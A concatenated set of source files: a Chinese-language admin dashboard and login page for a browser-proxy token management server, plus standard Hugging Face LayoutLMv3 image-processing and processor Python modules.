<button class="refresh-btn" onclick="refreshData()">刷新</button>
</h1>
<button class="logout-btn" onclick="logout()">登出</button>
</div>
<div class="info-grid">
<div class="info-item">
<h3>已连接浏览器</h3>
<div class="info-value" id="client-count">0</div>
</div>
<div class="info-item">
<h3>总请求次数</h3>
<div class="info-value" id="request-count">0</div>
</div>
<div class="info-item">
<h3>活跃令牌数量</h3>
<div class="info-value" id="token-count">0</div>
</div>
</div>
<div class="tabs">
<div class="tab active" onclick="openTab(event, 'browsers-tab')">浏览器状态</div>
<div class="tab" onclick="openTab(event, 'tokens-tab')">令牌管理</div>
<div class="tab" onclick="openTab(event, 'new-token-tab')">创建令牌</div>
</div>
<div id="browsers-tab" class="tab-content active">
<h2>浏览器列表</h2>
<table>
<thead>
<tr>
<th>ID</th>
<th>名称</th>
<th>状态</th>
<th>代理</th>
<th>代理ID</th>
<th>版本</th>
<th>连接时间</th>
<th>请求次数</th>
</tr>
</thead>
<tbody id="browsers-table">
<!-- 浏览器数据将在这里动态加载 -->
</tbody>
</table>
</div>
<div id="tokens-tab" class="tab-content">
<h2>令牌列表</h2>
<table>
<thead>
<tr>
<th>令牌</th>
<th>名称</th>
<th>创建时间</th>
<th>过期时间</th>
<th>使用次数/限制</th>
<th>允许的浏览器</th>
<th>操作</th>
</tr>
</thead>
<tbody id="tokens-table">
<!-- 令牌数据将在这里动态加载 -->
</tbody>
</table>
</div>
<div id="new-token-tab" class="tab-content">
<h2>创建新令牌</h2>
<div class="form-container">
<div class="form-group">
<label for="token-name">令牌名称</label>
<input type="text" id="token-name" placeholder="输入令牌名称">
</div>
<div class="form-group">
<div class="checkbox-group">
<input type="checkbox" id="unlimited-time" checked>
<label for="unlimited-time" style="display: inline;">永不过期</label>
</div>
<div id="expiry-time-container" class="hidden">
<label for="expiry-date">过期日期</label>
<input type="date" id="expiry-date">
<label for="expiry-time">过期时间</label>
<input type="time" id="expiry-time">
</div>
</div>
<div class="form-group">
<div class="checkbox-group">
<input type="checkbox" id="unlimited-uses" checked>
<label for="unlimited-uses" style="display: inline;">无限使用次数</label>
</div>
<div id="max-uses-container" class="hidden">
<label for="max-uses">最大使用次数</label>
<input type="number" id="max-uses" min="1" value="100">
</div>
</div>
<div class="form-group">
<div class="checkbox-group">
<input type="checkbox" id="allow-all-clients" checked>
<label for="allow-all-clients" style="display: inline;">允许所有浏览器</label>
</div>
<div id="allowed-clients-container" class="hidden">
<label for="allowed-clients">允许的浏览器</label>
<select id="allowed-clients" multiple size="4">
<!-- 浏览器选项将在这里动态加载 -->
</select>
<small>按住Ctrl键可以选择多个浏览器</small>
</div>
</div>
<button class="submit-btn" onclick="createToken()">创建令牌</button>
<div class="token-display" id="new-token-display">
<h3>新令牌已创建</h3>
<p>请保存以下令牌值,它只会显示一次:</p>
<div class="token-value" id="new-token-value"></div>
</div>
</div>
</div>
</div>
<script>
// 当前系统数据
let systemData = {
browsers: [],
tokens: []
};
// 页面加载时获取数据
document.addEventListener('DOMContentLoaded', function() {
refreshData();
// 设置过期和使用次数复选框的事件
document.getElementById('unlimited-time').addEventListener('change', function() {
document.getElementById('expiry-time-container').classList.toggle('hidden', this.checked);
});
document.getElementById('unlimited-uses').addEventListener('change', function() {
document.getElementById('max-uses-container').classList.toggle('hidden', this.checked);
});
document.getElementById('allow-all-clients').addEventListener('change', function() {
document.getElementById('allowed-clients-container').classList.toggle('hidden', this.checked);
});
});
// 切换标签页
function openTab(evt, tabName) {
// 隐藏所有标签内容
const tabContents = document.getElementsByClassName('tab-content');
for (let i = 0; i < tabContents.length; i++) {
tabContents[i].classList.remove('active');
}
// 取消所有标签的active状态
const tabs = document.getElementsByClassName('tab');
for (let i = 0; i < tabs.length; i++) {
tabs[i].classList.remove('active');
}
// 显示当前标签内容并激活当前标签
document.getElementById(tabName).classList.add('active');
evt.currentTarget.classList.add('active');
}
// 刷新所有数据
function refreshData() {
fetch('/api/system_info')
.then(response => response.json())
.then(data => {
systemData = data;
// 更新摘要信息
document.getElementById('client-count').textContent = data.client_count;
document.getElementById('request-count').textContent = data.total_requests;
document.getElementById('token-count').textContent = data.active_tokens;
// 更新浏览器列表
updateBrowsersTable(data.browsers);
// 更新令牌列表
updateTokensTable(data.tokens);
// 更新浏览器选择框
updateBrowserSelect(data.browsers);
})
.catch(error => {
console.error('获取系统信息失败:', error);
});
}
// 更新浏览器表格
function updateBrowsersTable(browsers) {
const tableBody = document.getElementById('browsers-table');
tableBody.innerHTML = '';
if (browsers.length === 0) {
const row = document.createElement('tr');
row.innerHTML = '<td colspan="8" style="text-align: center;">没有已连接的浏览器</td>';
tableBody.appendChild(row);
return;
}
browsers.forEach(browser => {
const row = document.createElement('tr');
// 为忙碌的浏览器添加不同的背景色
if (browser.busy) {
row.style.backgroundColor = '#fff8e1';
}
row.innerHTML = `
<td>${browser.id}</td>
<td>${browser.name}</td>
<td>
<span class="status-badge ${browser.status === '已连接' ? 'status-connected' : 'status-disconnected'}">
${browser.status}
</span>
${browser.busy ? '<span class="status-badge status-busy">忙碌中</span>' : ''}
</td>
<td>${browser.proxy}</td>
<td>${browser.proxy_id}</td>
<td>${browser.version}</td>
<td>${browser.connected_at}</td>
<td>${browser.request_count}</td>
`;
tableBody.appendChild(row);
});
}
// 更新令牌表格
function updateTokensTable(tokens) {
const tableBody = document.getElementById('tokens-table');
tableBody.innerHTML = '';
if (tokens.length === 0) {
const row = document.createElement('tr');
row.innerHTML = '<td colspan="7" style="text-align: center;">没有活跃的令牌</td>';
tableBody.appendChild(row);
return;
}
tokens.forEach(token => {
const row = document.createElement('tr');
// 显示截断的令牌值
const shortToken = token.token.substring(0, 8) + '...' + token.token.substring(token.token.length - 4);
// 显示使用情况
const useLimit = typeof token.max_uses === 'string' ? token.max_uses : `${token.uses}/${token.max_uses}`;
// 显示允许的浏览器
const allowedClients = Array.isArray(token.allowed_clients)
? token.allowed_clients.join(', ')
: token.allowed_clients;
row.innerHTML = `
<td title="${token.token}">${shortToken}</td>
<td>${token.name}</td>
<td>${token.created_at}</td>
<td>${token.expiry}</td>
<td>${useLimit}</td>
<td>${allowedClients}</td>
<td>
<button class="action-btn delete" onclick="deleteToken('${token.token}')">删除</button>
</td>
`;
tableBody.appendChild(row);
});
}
// 更新浏览器选择框
function updateBrowserSelect(browsers) {
const select = document.getElementById('allowed-clients');
select.innerHTML = '';
const connectedBrowsers = browsers.filter(browser => browser.status === '已连接');
if (connectedBrowsers.length === 0) {
const option = document.createElement('option');
option.disabled = true;
option.textContent = '没有已连接的浏览器';
select.appendChild(option);
return;
}
connectedBrowsers.forEach(browser => {
const option = document.createElement('option');
option.value = browser.id;
option.textContent = `${browser.name} (${browser.id})`;
select.appendChild(option);
});
}
// 创建新令牌
function createToken() {
// 获取表单数据
const name = document.getElementById('token-name').value || '未命名令牌';
const unlimitedTime = document.getElementById('unlimited-time').checked;
const unlimitedUses = document.getElementById('unlimited-uses').checked;
const allowAllClients = document.getElementById('allow-all-clients').checked;
// 构建请求数据
const data = {
name: name,
unlimited_time: unlimitedTime,
unlimited_uses: unlimitedUses,
allow_all_clients: allowAllClients
};
// 如果有过期时间
if (!unlimitedTime) {
const expiryDate = document.getElementById('expiry-date').value;
const expiryTime = document.getElementById('expiry-time').value || '23:59:59';
if (!expiryDate) {
alert('请选择过期日期');
return;
}
data.expiry_date = expiryDate;
data.expiry_time = expiryTime;
}
// 如果有使用次数限制
if (!unlimitedUses) {
const maxUses = document.getElementById('max-uses').value;
if (!maxUses || parseInt(maxUses) <= 0) {
alert('请输入有效的使用次数限制');
return;
}
data.max_uses = parseInt(maxUses);
}
// 如果限制了允许的浏览器
if (!allowAllClients) {
const select = document.getElementById('allowed-clients');
const selectedBrowsers = Array.from(select.selectedOptions).map(option => option.value);
if (selectedBrowsers.length === 0) {
alert('请至少选择一个浏览器');
return;
}
data.allowed_clients = selectedBrowsers;
}
// 发送请求创建令牌
fetch('/api/tokens', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
})
.then(response => response.json())
.then(result => {
if (result.status === 'success') {
// 显示新令牌
document.getElementById('new-token-value').textContent = result.token;
document.getElementById('new-token-display').style.display = 'block';
// 刷新数据
refreshData();
// 重置表单
document.getElementById('token-name').value = '';
} else {
alert('创建令牌失败: ' + (result.error || '未知错误'));
}
})
.catch(error => {
console.error('创建令牌请求失败:', error);
alert('创建令牌请求失败');
});
}
// 删除令牌
function deleteToken(token) {
if (confirm('确认要删除此令牌吗?删除后将无法恢复。')) {
fetch(`/api/tokens/${token}`, {
method: 'DELETE'
})
.then(response => response.json())
.then(result => {
if (result.status === 'success') {
refreshData();
} else {
alert('删除令牌失败: ' + (result.error || '未知错误'));
}
})
.catch(error => {
console.error('删除令牌请求失败:', error);
alert('删除令牌请求失败');
});
}
}
// 登出函数
function logout() {
if (confirm('确认要退出登录吗?')) {
window.location.href = '/admin/logout';
}
}
// 初始加载
refreshData();
</script>
</body>
</html> |
27182812/ChatGLM-LLaMA-chinese-insturct | 17,401 | src/transformers/models/layoutlmv3/image_processing_layoutlmv3.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Image processor class for LayoutLMv3."""
from typing import Dict, Iterable, Optional, Union
import numpy as np
from ...image_processing_utils import BaseImageProcessor, BatchFeature, get_size_dict
from ...image_transforms import normalize, rescale, resize, to_channel_dimension_format, to_pil_image
from ...image_utils import (
IMAGENET_STANDARD_MEAN,
IMAGENET_STANDARD_STD,
ChannelDimension,
ImageInput,
PILImageResampling,
infer_channel_dimension_format,
make_list_of_images,
to_numpy_array,
valid_images,
)
from ...utils import TensorType, is_pytesseract_available, is_vision_available, logging, requires_backends
if is_vision_available():
import PIL
# soft dependency
if is_pytesseract_available():
import pytesseract
logger = logging.get_logger(__name__)
def normalize_box(box, width, height):
return [
int(1000 * (box[0] / width)),
int(1000 * (box[1] / height)),
int(1000 * (box[2] / width)),
int(1000 * (box[3] / height)),
]
def apply_tesseract(image: np.ndarray, lang: Optional[str], tesseract_config: Optional[str]):
"""Applies Tesseract OCR on a document image, and returns recognized words + normalized bounding boxes."""
# apply OCR
pil_image = to_pil_image(image)
image_width, image_height = pil_image.size
data = pytesseract.image_to_data(pil_image, lang=lang, output_type="dict", config=tesseract_config)
words, left, top, width, height = data["text"], data["left"], data["top"], data["width"], data["height"]
# filter empty words and corresponding coordinates
irrelevant_indices = [idx for idx, word in enumerate(words) if not word.strip()]
words = [word for idx, word in enumerate(words) if idx not in irrelevant_indices]
left = [coord for idx, coord in enumerate(left) if idx not in irrelevant_indices]
top = [coord for idx, coord in enumerate(top) if idx not in irrelevant_indices]
width = [coord for idx, coord in enumerate(width) if idx not in irrelevant_indices]
height = [coord for idx, coord in enumerate(height) if idx not in irrelevant_indices]
# turn coordinates into (left, top, left+width, top+height) format
actual_boxes = []
for x, y, w, h in zip(left, top, width, height):
actual_box = [x, y, x + w, y + h]
actual_boxes.append(actual_box)
# finally, normalize the bounding boxes
normalized_boxes = []
for box in actual_boxes:
normalized_boxes.append(normalize_box(box, image_width, image_height))
assert len(words) == len(normalized_boxes), "Not as many words as there are bounding boxes"
return words, normalized_boxes
def flip_channel_order(image: np.ndarray, data_format: Optional[ChannelDimension] = None) -> np.ndarray:
input_data_format = infer_channel_dimension_format(image)
if input_data_format == ChannelDimension.LAST:
image = image[..., ::-1]
elif input_data_format == ChannelDimension.FIRST:
image = image[:, ::-1, ...]
else:
raise ValueError(f"Unsupported channel dimension: {input_data_format}")
if data_format is not None:
image = to_channel_dimension_format(image, data_format)
return image
class LayoutLMv3ImageProcessor(BaseImageProcessor):
r"""
Constructs a LayoutLMv3 image processor.
Args:
do_resize (`bool`, *optional*, defaults to `True`):
Whether to resize the image's (height, width) dimensions to `(size["height"], size["width"])`. Can be
overridden by `do_resize` in `preprocess`.
size (`Dict[str, int]` *optional*, defaults to `{"height": 224, "width": 224}`):
Size of the image after resizing. Can be overridden by `size` in `preprocess`.
resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BILINEAR`):
Resampling filter to use if resizing the image. Can be overridden by `resample` in `preprocess`.
do_rescale (`bool`, *optional*, defaults to `True`):
Whether to rescale the image's pixel values by the specified `rescale_value`. Can be overridden by
`do_rescale` in `preprocess`.
rescale_factor (`float`, *optional*, defaults to 1 / 255):
Value by which the image's pixel values are rescaled. Can be overridden by `rescale_factor` in
`preprocess`.
do_normalize (`bool`, *optional*, defaults to `True`):
Whether to normalize the image. Can be overridden by the `do_normalize` parameter in the `preprocess`
method.
image_mean (`Iterable[float]` or `float`, *optional*, defaults to `IMAGENET_STANDARD_MEAN`):
Mean to use if normalizing the image. This is a float or list of floats the length of the number of
channels in the image. Can be overridden by the `image_mean` parameter in the `preprocess` method.
image_std (`Iterable[float]` or `float`, *optional*, defaults to `IMAGENET_STANDARD_STD`):
Standard deviation to use if normalizing the image. This is a float or list of floats the length of the
number of channels in the image. Can be overridden by the `image_std` parameter in the `preprocess` method.
apply_ocr (`bool`, *optional*, defaults to `True`):
Whether to apply the Tesseract OCR engine to get words + normalized bounding boxes. Can be overridden by
the `apply_ocr` parameter in the `preprocess` method.
ocr_lang (`str`, *optional*):
The language, specified by its ISO code, to be used by the Tesseract OCR engine. By default, English is
used. Can be overridden by the `ocr_lang` parameter in the `preprocess` method.
tesseract_config (`str`, *optional*):
Any additional custom configuration flags that are forwarded to the `config` parameter when calling
Tesseract. For example: '--psm 6'. Can be overridden by the `tesseract_config` parameter in the
`preprocess` method.
"""
model_input_names = ["pixel_values"]
def __init__(
self,
do_resize: bool = True,
size: Dict[str, int] = None,
resample: PILImageResampling = PILImageResampling.BILINEAR,
do_rescale: bool = True,
rescale_value: float = 1 / 255,
do_normalize: bool = True,
image_mean: Union[float, Iterable[float]] = None,
image_std: Union[float, Iterable[float]] = None,
apply_ocr: bool = True,
ocr_lang: Optional[str] = None,
tesseract_config: Optional[str] = "",
**kwargs,
) -> None:
super().__init__(**kwargs)
size = size if size is not None else {"height": 224, "width": 224}
size = get_size_dict(size)
self.do_resize = do_resize
self.size = size
self.resample = resample
self.do_rescale = do_rescale
self.rescale_factor = rescale_value
self.do_normalize = do_normalize
self.image_mean = image_mean if image_mean is not None else IMAGENET_STANDARD_MEAN
self.image_std = image_std if image_std is not None else IMAGENET_STANDARD_STD
self.apply_ocr = apply_ocr
self.ocr_lang = ocr_lang
self.tesseract_config = tesseract_config
def resize(
self,
image: np.ndarray,
size: Dict[str, int],
resample: PILImageResampling = PILImageResampling.BILINEAR,
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
) -> np.ndarray:
"""
Resize an image to (size["height"], size["width"]) dimensions.
Args:
image (`np.ndarray`):
Image to resize.
size (`Dict[str, int]`):
Size of the output image.
resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BILINEAR`):
Resampling filter to use when resiizing the image.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
size = get_size_dict(size)
if "height" not in size or "width" not in size:
raise ValueError(f"The size dictionary must contain the keys 'height' and 'width'. Got {size.keys()}")
output_size = (size["height"], size["width"])
return resize(image, size=output_size, resample=resample, data_format=data_format, **kwargs)
def rescale(
self,
image: np.ndarray,
scale: Union[int, float],
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
) -> np.ndarray:
"""
Rescale an image by a scale factor. image = image * scale.
Args:
image (`np.ndarray`):
Image to rescale.
scale (`int` or `float`):
Scale to apply to the image.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
return rescale(image, scale=scale, data_format=data_format, **kwargs)
def normalize(
self,
image: np.ndarray,
mean: Union[float, Iterable[float]],
std: Union[float, Iterable[float]],
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
) -> np.ndarray:
"""
Normalize an image.
Args:
image (`np.ndarray`):
Image to normalize.
mean (`float` or `Iterable[float]`):
Mean values to be used for normalization.
std (`float` or `Iterable[float]`):
Standard deviation values to be used for normalization.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
return normalize(image, mean=mean, std=std, data_format=data_format, **kwargs)
def preprocess(
self,
images: ImageInput,
do_resize: bool = None,
size: Dict[str, int] = None,
resample=None,
do_rescale: bool = None,
rescale_factor: float = None,
do_normalize: bool = None,
image_mean: Union[float, Iterable[float]] = None,
image_std: Union[float, Iterable[float]] = None,
apply_ocr: bool = None,
ocr_lang: Optional[str] = None,
tesseract_config: Optional[str] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
data_format: ChannelDimension = ChannelDimension.FIRST,
**kwargs,
) -> PIL.Image.Image:
"""
Preprocess an image or batch of images.
Args:
images (`ImageInput`):
Image to preprocess.
do_resize (`bool`, *optional*, defaults to `self.do_resize`):
Whether to resize the image.
size (`Dict[str, int]`, *optional*, defaults to `self.size`):
Desired size of the output image after applying `resize`.
resample (`int`, *optional*, defaults to `self.resample`):
Resampling filter to use if resizing the image. This can be one of the `PILImageResampling` filters.
Only has an effect if `do_resize` is set to `True`.
do_rescale (`bool`, *optional*, defaults to `self.do_rescale`):
Whether to rescale the image pixel values between [0, 1].
rescale_factor (`float`, *optional*, defaults to `self.rescale_factor`):
Rescale factor to apply to the image pixel values. Only has an effect if `do_rescale` is set to `True`.
do_normalize (`bool`, *optional*, defaults to `self.do_normalize`):
Whether to normalize the image.
image_mean (`float` or `Iterable[float]`, *optional*, defaults to `self.image_mean`):
Mean values to be used for normalization. Only has an effect if `do_normalize` is set to `True`.
image_std (`float` or `Iterable[float]`, *optional*, defaults to `self.image_std`):
Standard deviation values to be used for normalization. Only has an effect if `do_normalize` is set to
`True`.
apply_ocr (`bool`, *optional*, defaults to `self.apply_ocr`):
Whether to apply the Tesseract OCR engine to get words + normalized bounding boxes.
ocr_lang (`str`, *optional*, defaults to `self.ocr_lang`):
The language, specified by its ISO code, to be used by the Tesseract OCR engine. By default, English is
used.
tesseract_config (`str`, *optional*, defaults to `self.tesseract_config`):
Any additional custom configuration flags that are forwarded to the `config` parameter when calling
Tesseract.
return_tensors (`str` or `TensorType`, *optional*):
The type of tensors to return. Can be one of:
- Unset: Return a list of `np.ndarray`.
- `TensorType.TENSORFLOW` or `'tf'`: Return a batch of type `tf.Tensor`.
- `TensorType.PYTORCH` or `'pt'`: Return a batch of type `torch.Tensor`.
- `TensorType.NUMPY` or `'np'`: Return a batch of type `np.ndarray`.
- `TensorType.JAX` or `'jax'`: Return a batch of type `jax.numpy.ndarray`.
data_format (`ChannelDimension` or `str`, *optional*, defaults to `ChannelDimension.FIRST`):
The channel dimension format for the output image. Can be one of:
- `ChannelDimension.FIRST`: image in (num_channels, height, width) format.
- `ChannelDimension.LAST`: image in (height, width, num_channels) format.
"""
do_resize = do_resize if do_resize is not None else self.do_resize
size = size if size is not None else self.size
size = get_size_dict(size)
resample = resample if resample is not None else self.resample
do_rescale = do_rescale if do_rescale is not None else self.do_rescale
rescale_factor = rescale_factor if rescale_factor is not None else self.rescale_factor
do_normalize = do_normalize if do_normalize is not None else self.do_normalize
image_mean = image_mean if image_mean is not None else self.image_mean
image_std = image_std if image_std is not None else self.image_std
apply_ocr = apply_ocr if apply_ocr is not None else self.apply_ocr
ocr_lang = ocr_lang if ocr_lang is not None else self.ocr_lang
tesseract_config = tesseract_config if tesseract_config is not None else self.tesseract_config
images = make_list_of_images(images)
if not valid_images(images):
raise ValueError(
"Invalid image type. Must be of type PIL.Image.Image, numpy.ndarray, "
"torch.Tensor, tf.Tensor or jax.ndarray."
)
if do_resize and size is None:
raise ValueError("Size must be specified if do_resize is True.")
if do_rescale and rescale_factor is None:
raise ValueError("Rescale factor must be specified if do_rescale is True.")
if do_normalize and (image_mean is None or image_std is None):
raise ValueError("If do_normalize is True, image_mean and image_std must be specified.")
# All transformations expect numpy arrays.
images = [to_numpy_array(image) for image in images]
# Tesseract OCR to get words + normalized bounding boxes
if apply_ocr:
requires_backends(self, "pytesseract")
words_batch = []
boxes_batch = []
for image in images:
words, boxes = apply_tesseract(image, ocr_lang, tesseract_config)
words_batch.append(words)
boxes_batch.append(boxes)
if do_resize:
images = [self.resize(image=image, size=size, resample=resample) for image in images]
if do_rescale:
images = [self.rescale(image=image, scale=rescale_factor) for image in images]
if do_normalize:
images = [self.normalize(image=image, mean=image_mean, std=image_std) for image in images]
# flip color channels from RGB to BGR (as Detectron2 requires this)
images = [to_channel_dimension_format(image, data_format) for image in images]
data = BatchFeature(data={"pixel_values": images}, tensor_type=return_tensors)
if apply_ocr:
data["words"] = words_batch
data["boxes"] = boxes_batch
return data
|
2833844911/cyTlsXhr | 1,018 | templates/login.html | <!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>代理服务器管理登录</title>
<link rel="stylesheet" href="/static/css/style.css">
</head>
<body>
<div class="login-container">
<div class="login-box">
<h2>代理服务器管理系统</h2>
<div id="error-message" class="error-message"></div>
<form id="login-form">
<div class="form-group">
<label for="username">用户名</label>
<input type="text" id="username" name="username" required>
</div>
<div class="form-group">
<label for="password">密码</label>
<input type="password" id="password" name="password" required>
</div>
<button type="submit" class="btn-login">登录</button>
</form>
</div>
</div>
<script src="/static/js/login.js"></script>
</body>
</html> |
27182812/ChatGLM-LLaMA-chinese-insturct | 9,085 | src/transformers/models/layoutlmv3/processing_layoutlmv3.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Processor class for LayoutLMv3.
"""
import warnings
from typing import List, Optional, Union
from ...processing_utils import ProcessorMixin
from ...tokenization_utils_base import BatchEncoding, PaddingStrategy, PreTokenizedInput, TextInput, TruncationStrategy
from ...utils import TensorType
class LayoutLMv3Processor(ProcessorMixin):
r"""
Constructs a LayoutLMv3 processor which combines a LayoutLMv3 image processor and a LayoutLMv3 tokenizer into a
single processor.
[`LayoutLMv3Processor`] offers all the functionalities you need to prepare data for the model.
It first uses [`LayoutLMv3ImageProcessor`] to resize and normalize document images, and optionally applies OCR to
get words and normalized bounding boxes. These are then provided to [`LayoutLMv3Tokenizer`] or
[`LayoutLMv3TokenizerFast`], which turns the words and bounding boxes into token-level `input_ids`,
`attention_mask`, `token_type_ids`, `bbox`. Optionally, one can provide integer `word_labels`, which are turned
into token-level `labels` for token classification tasks (such as FUNSD, CORD).
Args:
image_processor (`LayoutLMv3ImageProcessor`):
An instance of [`LayoutLMv3ImageProcessor`]. The image processor is a required input.
tokenizer (`LayoutLMv3Tokenizer` or `LayoutLMv3TokenizerFast`):
An instance of [`LayoutLMv3Tokenizer`] or [`LayoutLMv3TokenizerFast`]. The tokenizer is a required input.
"""
attributes = ["image_processor", "tokenizer"]
image_processor_class = "LayoutLMv3ImageProcessor"
tokenizer_class = ("LayoutLMv3Tokenizer", "LayoutLMv3TokenizerFast")
def __init__(self, image_processor=None, tokenizer=None, **kwargs):
if "feature_extractor" in kwargs:
warnings.warn(
"The `feature_extractor` argument is deprecated and will be removed in v5, use `image_processor`"
" instead.",
FutureWarning,
)
feature_extractor = kwargs.pop("feature_extractor")
image_processor = image_processor if image_processor is not None else feature_extractor
if image_processor is None:
raise ValueError("You need to specify an `image_processor`.")
if tokenizer is None:
raise ValueError("You need to specify a `tokenizer`.")
super().__init__(image_processor, tokenizer)
def __call__(
self,
images,
text: Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]] = None,
text_pair: Optional[Union[PreTokenizedInput, List[PreTokenizedInput]]] = None,
boxes: Union[List[List[int]], List[List[List[int]]]] = None,
word_labels: Optional[Union[List[int], List[List[int]]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = None,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
return_tensors: Optional[Union[str, TensorType]] = None,
**kwargs,
) -> BatchEncoding:
"""
This method first forwards the `images` argument to [`~LayoutLMv3ImageProcessor.__call__`]. In case
[`LayoutLMv3ImageProcessor`] was initialized with `apply_ocr` set to `True`, it passes the obtained words and
bounding boxes along with the additional arguments to [`~LayoutLMv3Tokenizer.__call__`] and returns the output,
together with resized and normalized `pixel_values`. In case [`LayoutLMv3ImageProcessor`] was initialized with
`apply_ocr` set to `False`, it passes the words (`text`/``text_pair`) and `boxes` specified by the user along
with the additional arguments to [`~LayoutLMv3Tokenizer.__call__`] and returns the output, together with
resized and normalized `pixel_values`.
Please refer to the docstring of the above two methods for more information.
"""
# verify input
if self.image_processor.apply_ocr and (boxes is not None):
raise ValueError(
"You cannot provide bounding boxes if you initialized the image processor with apply_ocr set to True."
)
if self.image_processor.apply_ocr and (word_labels is not None):
raise ValueError(
"You cannot provide word labels if you initialized the image processor with apply_ocr set to True."
)
# first, apply the image processor
features = self.image_processor(images=images, return_tensors=return_tensors)
# second, apply the tokenizer
if text is not None and self.image_processor.apply_ocr and text_pair is None:
if isinstance(text, str):
text = [text] # add batch dimension (as the image processor always adds a batch dimension)
text_pair = features["words"]
encoded_inputs = self.tokenizer(
text=text if text is not None else features["words"],
text_pair=text_pair if text_pair is not None else None,
boxes=boxes if boxes is not None else features["boxes"],
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
return_tensors=return_tensors,
**kwargs,
)
# add pixel values
images = features.pop("pixel_values")
if return_overflowing_tokens is True:
images = self.get_overflowing_images(images, encoded_inputs["overflow_to_sample_mapping"])
encoded_inputs["pixel_values"] = images
return encoded_inputs
def get_overflowing_images(self, images, overflow_to_sample_mapping):
# in case there's an overflow, ensure each `input_ids` sample is mapped to its corresponding image
images_with_overflow = []
for sample_idx in overflow_to_sample_mapping:
images_with_overflow.append(images[sample_idx])
if len(images_with_overflow) != len(overflow_to_sample_mapping):
raise ValueError(
"Expected length of images to be the same as the length of `overflow_to_sample_mapping`, but got"
f" {len(images_with_overflow)} and {len(overflow_to_sample_mapping)}"
)
return images_with_overflow
def batch_decode(self, *args, **kwargs):
"""
This method forwards all its arguments to PreTrainedTokenizer's [`~PreTrainedTokenizer.batch_decode`]. Please
refer to the docstring of this method for more information.
"""
return self.tokenizer.batch_decode(*args, **kwargs)
def decode(self, *args, **kwargs):
"""
This method forwards all its arguments to PreTrainedTokenizer's [`~PreTrainedTokenizer.decode`]. Please refer
to the docstring of this method for more information.
"""
return self.tokenizer.decode(*args, **kwargs)
@property
def model_input_names(self):
return ["input_ids", "bbox", "attention_mask", "pixel_values"]
@property
def feature_extractor_class(self):
warnings.warn(
"`feature_extractor_class` is deprecated and will be removed in v5. Use `image_processor_class` instead.",
FutureWarning,
)
return self.image_processor_class
@property
def feature_extractor(self):
warnings.warn(
"`feature_extractor` is deprecated and will be removed in v5. Use `image_processor` instead.",
FutureWarning,
)
return self.image_processor
|
27182812/ChatGLM-LLaMA-chinese-insturct | 1,195 | src/transformers/models/layoutlmv3/feature_extraction_layoutlmv3.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Feature extractor class for LayoutLMv3.
"""
import warnings
from ...utils import logging
from .image_processing_layoutlmv3 import LayoutLMv3ImageProcessor
logger = logging.get_logger(__name__)
class LayoutLMv3FeatureExtractor(LayoutLMv3ImageProcessor):
def __init__(self, *args, **kwargs) -> None:
warnings.warn(
"The class LayoutLMv3FeatureExtractor is deprecated and will be removed in version 5 of Transformers."
" Please use LayoutLMv3ImageProcessor instead.",
FutureWarning,
)
super().__init__(*args, **kwargs)
|
2833844911/cyTlsXhr | 1,431 | static/js/login.js | document.addEventListener('DOMContentLoaded', function() {
const loginForm = document.getElementById('login-form');
const errorMessage = document.getElementById('error-message');
// 检查是否已登录
if (localStorage.getItem('token')) {
window.location.href = '/dashboard';
return;
}
// 处理登录表单提交
loginForm.addEventListener('submit', function(e) {
e.preventDefault();
const username = document.getElementById('username').value;
const password = document.getElementById('password').value;
// 发送登录请求
fetch('/api/login', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
